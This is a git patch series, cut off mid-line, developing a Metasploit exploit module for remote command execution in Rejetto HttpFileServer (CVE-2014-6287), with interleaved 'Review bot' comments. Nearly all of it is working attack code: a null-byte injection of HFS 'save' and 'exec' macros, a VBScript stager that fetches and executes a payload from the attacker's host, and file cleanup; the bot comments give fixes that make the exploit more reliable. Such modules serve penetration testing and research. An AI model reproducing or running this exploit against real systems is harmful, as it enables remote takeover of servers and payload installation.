From 8b4b66fcaa7ec37c2e8dec81464ffa7a3f252e73 Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Sun, 14 Sep 2014 12:26:02 +0800 Subject: [PATCH 01/16] initial test --- .../windows/http/http_file_server_exec.rb | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 modules/exploits/windows/http/http_file_server_exec.rb diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb new file mode 100644 index 0000000000..a816372efb --- /dev/null +++ b/modules/exploits/windows/http/http_file_server_exec.rb 
@@ -0,0 +1,73 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "HttpClient and HttpServer Example", + 'Description' => %q{ + This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time, + but this allows the HttpServer to terminate after a delay. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'mfadzilr' ], + 'References' => + [ + ['URL', 'http://metasploit.com'] + ], + 'Payload' => { 'BadChars' => "\x00" }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ], + ], + 'CmdStagerFlavor' => 'vbs' + 'Privileged' => false, + 'DisclosureDate' => "Sep 14 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to some web application', '/']), + OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]) + ], self.class) + end + + def on_request_uri(cli, req) + print_status("#{peer} - Payload request received: #{req.uri}") + exe = generate_payload_exe + send_response(cli, exe, 'You get this, I own you') + end + + def primer + uri = target_uri.path + fname = "evil.vbs" + save_path = "c:\\" + fname + vbs_evil = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0ax.Open \x22GET\x22,\x22http://#{RHOST}/#{fname}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText" + exec_save = "%00{.save|save_path|#{vbs_evil}.}" + print_status("Sending a malicious request to #{target_uri.path}") + #send_request_cgi({'uri'=>normalize_uri(target_uri.path)}) + send_request_cgi({ + 'method' => 'GET', + 'uri' => 'normalize_uri(uri,'?search=' + exec_save), + }) + end + + def exploit + begin + 
Timeout.timeout(datastore['HTTPDELAY']) { super } + rescue Timeout::Error + # When the server stops due to our timeout, this is raised + end + end +end From 74ef83812aaa7d30ef8211972136d2fa64c3099f Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Mon, 15 Sep 2014 01:43:18 +0800 Subject: [PATCH 02/16] update module vulnerability information --- .../windows/http/http_file_server_exec.rb | 61 ++++++++++++------- 1 file changed, 38 insertions(+), 23 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index a816372efb..f7296bee83 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb 
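Review bot: The file as committed does not parse: the `'CmdStagerFlavor' => 'vbs'` entry in `initialize` has no trailing comma before `'Privileged'`, and the quoting on `'uri' => 'normalize_uri(uri,'?search=' + exec_save),` in `primer` is broken, where `'uri' => normalize_uri(uri) + '?search=' + exec_save` is presumably intended. In the same method `exec_save` embeds the literal text `save_path` instead of the variable's value, and `RHOST` is a bare constant where `datastore['RHOST']` is meant. In `exploit`, `HTTPDELAY` is optional and `Timeout.timeout` treats `nil` or `0` as "no timeout", so the HTTP server would then never terminate; say so in the option description or reject `0`.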
@@ -6,61 +6,76 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Reank = NormalRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::HttpServer::HTML - include Msf::Exploit::FileDropper + include Msf::Exploit::EXE + include Msf::Exploit::Remote::HttpServer + #include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, - 'Name' => "HttpClient and HttpServer Example", + 'Name' => "HttpFileServer 2.3.x Remote Command Execution", 'Description' => %q{ - This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time, - but this allows the HttpServer to terminate after a delay. + HFS is vulnerable to remote command execution attack due to a poor regex in the file + ParserLib.pas. This module exploit the HFS scripting command by using '%00' to bypass + the filtering. }, 'License' => MSF_LICENSE, - 'Author' => [ 'mfadzilr' ], + 'Author' => + [ + 'Daniele Linguaglossa ', # orginal p.o.c + 'Muhamad Fadzil Ramli ' # metasploit module + ], 'References' => [ - ['URL', 'http://metasploit.com'] + ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], + ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], ], - 'Payload' => { 'BadChars' => "\x00" }, + 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], ], - 'CmdStagerFlavor' => 'vbs' + #'CmdStagerFlavor' => 'vbs', 'Privileged' => false, 'DisclosureDate' => "Sep 14 2014", 'DefaultTarget' => 0)) register_options( [ - OptString.new('TARGETURI', [true, 'The path to some web application', '/']), - OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]) + OptString.new('TARGETURI', [true, 'The path of the web application', '/']), + OptString.new('SAVE_PATH', [true, 'Location where the vbs script will be executed', 'c:\\']), + OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web 
server', 10]), ], self.class) end def on_request_uri(cli, req) print_status("#{peer} - Payload request received: #{req.uri}") exe = generate_payload_exe - send_response(cli, exe, 'You get this, I own you') + vbs = Msf::Util::EXE.to_exe_vbs(exe) + send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) end def primer - uri = target_uri.path - fname = "evil.vbs" - save_path = "c:\\" + fname - vbs_evil = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0ax.Open \x22GET\x22,\x22http://#{RHOST}/#{fname}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText" - exec_save = "%00{.save|save_path|#{vbs_evil}.}" + + file_name = rand_text_alpha(rand(10)+5) + file_ext = '.vbs' + file_fullname = file_name + file_ext + + vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0aif err.number <> 0 then wsh.exit\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText" + + payload = "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}" + payload = URI::encode(payload) + + exec_cmd = "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" + exec_cmd = URI::encode(exec_cmd) + print_status("Sending a malicious request to #{target_uri.path}") - #send_request_cgi({'uri'=>normalize_uri(target_uri.path)}) - send_request_cgi({ - 'method' => 'GET', - 'uri' => 'normalize_uri(uri,'?search=' + exec_save), - }) + Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{payload}.}") + Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{exec_cmd}.}") + end def exploit From f1d3c44f4f78d070777e36e3b6b0947e0cc6e085 Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Mon, 15 Sep 2014 12:59:27 +0800 Subject: [PATCH 03/16] exploit module for HTTP File Server version 2.3b, exploiting HFS scripting commands 'save' and 'exec'. --- .../windows/http/http_file_server_exec.rb | 45 ++++++++++++------- 1 file changed, 30 insertions(+), 15 deletions(-) 
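Review bot: `Net::HTTP.get(datastore['RHOST'], ...)` in `primer` bypasses the HttpClient mixin the module includes, so RPORT, SSL, proxy settings and `TARGETURI` are all ignored and every request goes to port 80; use `send_request_raw` with the same `/?search=%00{...}` path (raw, so the leading `%00` is not re-encoded). The `Reank = NormalRanking` typo on the class leaves `Rank` undefined. The second macro, `exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}`, omits the `.vbs` extension that the `save` step wrote (`file_fullname`), so the launched path may not resolve; `exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}` runs the script directly without spawning a console. The `def exploit` at the end of the hunk continues outside it.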
diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index f7296bee83..580065110b 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -11,34 +11,34 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer - #include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "HttpFileServer 2.3.x Remote Command Execution", 'Description' => %q{ HFS is vulnerable to remote command execution attack due to a poor regex in the file - ParserLib.pas. This module exploit the HFS scripting command by using '%00' to bypass + ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass the filtering. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Daniele Linguaglossa ', # orginal p.o.c + 'Daniele Linguaglossa ', # orginal discovery 'Muhamad Fadzil Ramli ' # metasploit module ], 'References' => [ ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], + ['CVE', 'CVE-2014-6287'], ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, + # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600] 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], ], - #'CmdStagerFlavor' => 'vbs', 'Privileged' => false, 'DisclosureDate' => "Sep 14 2014", 'DefaultTarget' => 0)) 
@@ -46,36 +46,51 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ OptString.new('TARGETURI', [true, 'The path of the web application', '/']), - OptString.new('SAVE_PATH', [true, 'Location where the vbs script will be executed', 'c:\\']), + OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']), OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]), ], self.class) end + def check + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/' + }) + + if res.headers['Server'] =~ /HFS 2.3/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + def on_request_uri(cli, req) print_status("#{peer} - Payload request received: #{req.uri}") exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) + remove_resource(get_resource) # remove resource after serving 1st reequest. end def primer - file_name = rand_text_alpha(rand(10)+5) file_ext = '.vbs' file_fullname = file_name + file_ext - vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0aif err.number <> 0 then wsh.exit\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText" + vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText" - payload = "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}" - payload = URI::encode(payload) - - exec_cmd = "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" - exec_cmd = URI::encode(exec_cmd) + payloads = [ + "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", + "exec|cmd /q /c start 
#{datastore['SAVE_PATH']}#{file_name}" + ] print_status("Sending a malicious request to #{target_uri.path}") - Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{payload}.}") - Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{exec_cmd}.}") - + payloads.each { |payload| + send_request_raw({ + 'method' => 'GET', + 'uri' => "/?search=%00{.#{URI::encode(payload)}.}" + }) + } end def exploit From 9860ed340efa3ecb2998da8d42cb5c49f51a70e8 Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Mon, 15 Sep 2014 13:13:25 +0800 Subject: [PATCH 04/16] run msftidy, make correction for CVE format and space at EOL (line 77) --- modules/exploits/windows/http/http_file_server_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 580065110b..bd893034dc 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote [ ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], - ['CVE', 'CVE-2014-6287'], + ['CVE', '2014-6287'], ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600] @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote def primer file_name = rand_text_alpha(rand(10)+5) - file_ext = '.vbs' + file_ext = '.vbs' file_fullname = file_name + file_ext vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText" From 783b03efb62198a7882a2bad92e2878c92ec661a Mon Sep 17 00:00:00 2001 
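Review bot: `TARGETURI` is registered as a required option but never used: `check` requests `'/'` and `primer` sends `"/?search=..."` verbatim, while the status line claims `Sending a malicious request to #{target_uri.path}`. Build the path from the option, e.g. `'uri' => normalize_uri(target_uri.path) + "?search=%00{.#{URI::encode(payload)}.}"` in `primer` and `'uri' => normalize_uri(target_uri.path)` in `check`. `check` also dereferences `res.headers['Server']` without guarding `res`, which is `nil` when the connection fails, so an unreachable host raises instead of returning a check code. The `def exploit` after `primer` continues outside the hunk.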
From: mfadzilr Date: Mon, 15 Sep 2014 17:21:05 +0800 Subject: [PATCH 05/16] change line 84 as mubix advice, update disclosure date according to bugtraq security list. --- modules/exploits/windows/http/http_file_server_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index bd893034dc..874a33a816 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Automatic', {} ], ], 'Privileged' => false, - 'DisclosureDate' => "Sep 14 2014", + 'DisclosureDate' => "Sep 11 2014", 'DefaultTarget' => 0)) register_options( @@ -81,7 +81,8 @@ class Metasploit3 < Msf::Exploit::Remote payloads = [ "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", - "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" + #"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" + "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" ] print_status("Sending a malicious request to #{target_uri.path}") From 978803e9d80915fcf9b94ae9cab3982fc38acbd3 Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Tue, 16 Sep 2014 21:49:02 +0800 Subject: [PATCH 06/16] add proper regex --- modules/exploits/windows/http/http_file_server_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 874a33a816..5681858572 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/' }) - if res.headers['Server'] =~ /HFS 2.3/ + if res.headers['Server'] =~ /HFS 2\.3/ # added proper regex return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe 
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote payloads = [ "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", #"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" - "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" + "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" # using wscript instead of cmd.exe, thanks mubix ] print_status("Sending a malicious request to #{target_uri.path}") From 677d035ce8c248506c76815fb4135c76a7a2d27d Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Fri, 19 Sep 2014 11:30:51 +0800 Subject: [PATCH 07/16] added proper regex for check function add comment for changed code --- .../windows/http/http_file_server_exec.rb | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 5681858572..f123d51d08 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -57,7 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/' }) - if res.headers['Server'] =~ /HFS 2\.3/ # added proper regex + if res.headers['Server'] =~ /HFS 2\.3/ + # added proper regex as pointed by wchen return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -69,7 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) - remove_resource(get_resource) # remove resource after serving 1st reequest. + # remove resource after serving 1st request as 'exec' execute 4x + # during exploitation + remove_resource(get_resource) end def primer 
@@ -77,12 +80,14 @@ class Metasploit3 < Msf::Exploit::Remote file_ext = '.vbs' file_fullname = file_name + file_ext - vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText" + vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText" payloads = [ "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", - #"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" - "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" # using wscript instead of cmd.exe, thanks mubix + "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}", + # using wscript.exe instead of cmd.exe, thank mubix + "delete|#{datastore['SAVE_PATH']}#{file_fullname}" + # delete vbs file after execution ] print_status("Sending a malicious request to #{target_uri.path}") From 19ed594e9839b4fa9a150d9ef9a9373cea45c44a Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Sat, 20 Sep 2014 10:52:21 +0800 Subject: [PATCH 08/16] using FileDropper method for cleanup --- modules/exploits/windows/http/http_file_server_exec.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index f123d51d08..5e4a2f71a8 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb 
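Review bot: The new `"delete|#{datastore['SAVE_PATH']}#{file_fullname}"` macro is sent as a separate HTTP request immediately after the `exec|wscript.exe //B //NOLOGO ...` one, with nothing ordering the two on the server side; if HFS processes the delete before `wscript.exe` has opened the file, the stage never runs and the exploit fails silently. The module already includes nothing that waits for the session, so deferring the removal to the FileDropper mixin (`register_file_for_cleanup`) after the loop, which deletes once a session exists, is the safer sequencing. The `print_status` line at the hunk's end starts the request loop that continues below it.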
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, @@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}", # using wscript.exe instead of cmd.exe, thank mubix - "delete|#{datastore['SAVE_PATH']}#{file_fullname}" + #"delete|#{datastore['SAVE_PATH']}#{file_fullname}" # delete vbs file after execution ] @@ -97,6 +98,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "/?search=%00{.#{URI::encode(payload)}.}" }) } + register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_fullname}") + # use FileDropper method for cleanup end def exploit From dd71c666dc43c9d0d01fd45e2609a89e3fe16524 Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Sat, 20 Sep 2014 15:31:28 +0800 Subject: [PATCH 09/16] added osvdb reference and software download url, use FileDropper method for cleanup --- modules/exploits/windows/http/http_file_server_exec.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 5e4a2f71a8..277de707c2 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -9,8 +9,8 @@ class Metasploit3 < Msf::Exploit::Remote Reank = NormalRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) 
@@ -30,8 +30,10 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], + ['URL', 'http://www.rejetto.com/hfs/download'], ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], ['CVE', '2014-6287'], + ['OSVDB', '111386'], ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600] From a2a2ca550e3f22f42bb52569b5cd1cc87dcf5f9e Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Sat, 20 Sep 2014 20:06:30 +0800 Subject: [PATCH 10/16] add test result on different windows version --- modules/exploits/windows/http/http_file_server_exec.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 277de707c2..ffef4a75bb 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -36,7 +36,10 @@ class Metasploit3 < Msf::Exploit::Remote ['OSVDB', '111386'], ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, - # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600] + # Tested HFS 2.3b : + # - Windows XP (Build 2600, Service Pack 3). + # - Windows 7 (Build 7601, Service Pack 1). + # - Windows 8 (Build 9200). 'Platform' => 'win', 'Targets' => [ @@ -73,9 +76,9 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) + remove_resource(get_resource) # remove resource after serving 1st request as 'exec' execute 4x # during exploitation - remove_resource(get_resource) end def primer From d913bf1c35efc37afa519bc01920cbfd07d5a6e8 Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 Date: Wed, 8 Oct 2014 10:29:59 -0500 Subject: [PATCH 11/16] Fix metadata --- .../windows/http/http_file_server_exec.rb | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index ffef4a75bb..8928e22086 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -15,11 +15,12 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, - 'Name' => "HttpFileServer 2.3.x Remote Command Execution", + 'Name' => "HttpFileServer Remote Command Execution", 'Description' => %q{ - HFS is vulnerable to remote command execution attack due to a poor regex in the file - ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass - the filtering. + HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex + in the file ParserLib.pas. This module exploit the HFS scripting commands by using '%00' + to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows + XP SP3, Windows 7 SP1 and Windows 8. }, 'License' => MSF_LICENSE, 'Author' => @@ -29,17 +30,12 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ - ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], - ['URL', 'http://www.rejetto.com/hfs/download'], - ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], ['CVE', '2014-6287'], ['OSVDB', '111386'], + ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], + ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'] ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, - # Tested HFS 2.3b : - # - Windows XP (Build 2600, Service Pack 3). - # - Windows 7 (Build 7601, Service Pack 1). - # - Windows 8 (Build 9200). 'Platform' => 'win', 'Targets' => [ 
From d02f0dc4b9776ca0b7e175d5af969e3759782b5d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 2014 10:36:56 -0500 Subject: [PATCH 12/16] Make minor cleanup --- .../windows/http/http_file_server_exec.rb | 42 ++++++++++--------- 1 file changed, 22 insertions(+), 20 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 8928e22086..f1f3454bec 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Reank = NormalRanking + Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer @@ -15,12 +15,12 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, - 'Name' => "HttpFileServer Remote Command Execution", + 'Name' => "Rejetto HttpFileServer Remote Command Execution", 'Description' => %q{ - HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex - in the file ParserLib.pas. This module exploit the HFS scripting commands by using '%00' - to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows - XP SP3, Windows 7 SP1 and Windows 8. + Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a + poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by + using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b + over Windows XP SP3, Windows 7 SP1 and Windows 8. }, 'License' => MSF_LICENSE, 'Author' => 
@@ -59,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/' }) - if res.headers['Server'] =~ /HFS 2\.3/ - # added proper regex as pointed by wchen + if res && res.headers['Server'] && res.headers['Server'] =~ /HFS 2\.3/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe 
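Review bot: When `send_request_raw` returns `nil` (no connection) or the reply carries no `Server` header, the new guard falls through to `Exploit::CheckCode::Safe`, which asserts the host is not vulnerable on no evidence; return `Exploit::CheckCode::Unknown` for a missing response and reserve `Safe` for a header that is present but not HFS, e.g. `return Exploit::CheckCode::Unknown unless res && res.headers['Server']` before the regex test. The `send_request_raw` call that produces `res` sits above the hunk.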
@@ -72,35 +71,38 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) - remove_resource(get_resource) # remove resource after serving 1st request as 'exec' execute 4x # during exploitation + remove_resource(get_resource) end def primer file_name = rand_text_alpha(rand(10)+5) file_ext = '.vbs' - file_fullname = file_name + file_ext + file_full_name = file_name + file_ext - vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText" + vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a" + vbs_code << "On Error Resume Next\x0d\x0a" + vbs_code << "x.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0a" + vbs_code << "If Err.Number <> 0 Then\x0d\x0a" + vbs_code << 